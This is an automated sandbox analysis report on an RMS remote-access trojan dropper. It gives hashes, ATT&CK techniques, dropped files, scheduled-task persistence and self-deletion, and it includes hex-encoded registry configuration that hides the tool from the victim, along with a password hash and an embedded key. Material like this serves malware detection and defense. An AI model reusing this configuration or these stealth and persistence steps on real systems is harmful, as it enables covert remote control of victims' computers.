rms | 0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e

Analysis

max time kernel
147s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12-12-2024 18:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
Size

7.9MB
MD5

ca298b43595a13e5bbb25535ead852f7
SHA1

6fc8d0e3d36b245b2eb895f512e171381a96e268
SHA256

0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e
SHA512

8c591cd0693b9516959c6d1c446f5619228021c1e7a95c208c736168cc90bc15dba47aca99aa6349f8e056a5c7f020c34b751d551260f9d3ba491b11cd953cf5
SSDEEP

196608:aVLfwfMrKrMKK7jkXyyOvO9oLcmPffZxrhpL2TmJe:aVL4MOr/KHkXPOvO9oTZxhpL

Score

10^/10

rms defense_evasion discovery rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

Deletes itself 1 IoCs

pid	Process
2164	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2848	rutserv.exe
2636	rutserv.exe

Loads dropped DLL 4 IoCs

pid	Process
2848	rutserv.exe
2848	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\ruts\11.reg	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
File created	C:\Windows\SysWOW64\ruts\rutserv.exe	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
File created	C:\Windows\SysWOW64\ruts\rfusclient.exe	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
File created	C:\Windows\SysWOW64\ruts\ssleay32.dll	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
File created	C:\Windows\SysWOW64\ruts\libeay32.dll	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2084-0-0x0000000000400000-0x000000000197D000-memory.dmp	upx
behavioral1/memory/2084-15-0x0000000000400000-0x000000000197D000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\TektonIT	regedit.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a	regedit.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223730313230223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42434536413638363145384133323441454133453342333332363045304634384431354136443844324633323636393041363643463637384533364132383633343444323745303844344145353038363730393646354642463639313232454335434130304342443143423644433941334637443841364435313831443538413c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973742f3e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e313c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a63774d544977496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a63774d544977496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a	regedit.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters	rutserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host	regedit.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters	regedit.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003700300031003200300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00	regedit.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\SysWOW64\ieframe.dll,-5723 = "The Internet"	rutserv.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3636312d3739332d3638312d3537333c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a	regedit.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a	regedit.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System	regedit.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe"	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2956	regedit.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2776	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2848	rutserv.exe
Token: SeDebugPrivilege	2848	rutserv.exe
Token: SeTakeOwnershipPrivilege	2636	rutserv.exe
Token: SeTcbPrivilege	2636	rutserv.exe
Token: SeTcbPrivilege	2636	rutserv.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2848	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe
2636	rutserv.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2888	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	31
PID 2084 wrote to memory of 2888	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	31
PID 2084 wrote to memory of 2888	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	31
PID 2084 wrote to memory of 2888	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	31
PID 2888 wrote to memory of 2492	2888	cmd.exe	33
PID 2888 wrote to memory of 2492	2888	cmd.exe	33
PID 2888 wrote to memory of 2492	2888	cmd.exe	33
PID 2888 wrote to memory of 2492	2888	cmd.exe	33
PID 2084 wrote to memory of 2312	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	34
PID 2084 wrote to memory of 2312	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	34
PID 2084 wrote to memory of 2312	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	34
PID 2084 wrote to memory of 2312	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	34
PID 2312 wrote to memory of 2956	2312	cmd.exe	36
PID 2312 wrote to memory of 2956	2312	cmd.exe	36
PID 2312 wrote to memory of 2956	2312	cmd.exe	36
PID 2312 wrote to memory of 2956	2312	cmd.exe	36
PID 2084 wrote to memory of 2704	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	37
PID 2084 wrote to memory of 2704	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	37
PID 2084 wrote to memory of 2704	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	37
PID 2084 wrote to memory of 2704	2084	0e903c6e2b98f30f11da65003a8aeb63d3daef5feb92da5896250f08b9758c7e.exe	37
PID 2704 wrote to memory of 2776	2704	cmd.exe	39
PID 2704 wrote to memory of 2776	2704	cmd.exe	39
PID 2704 wrote to memory of 2776	2704	cmd.exe	39
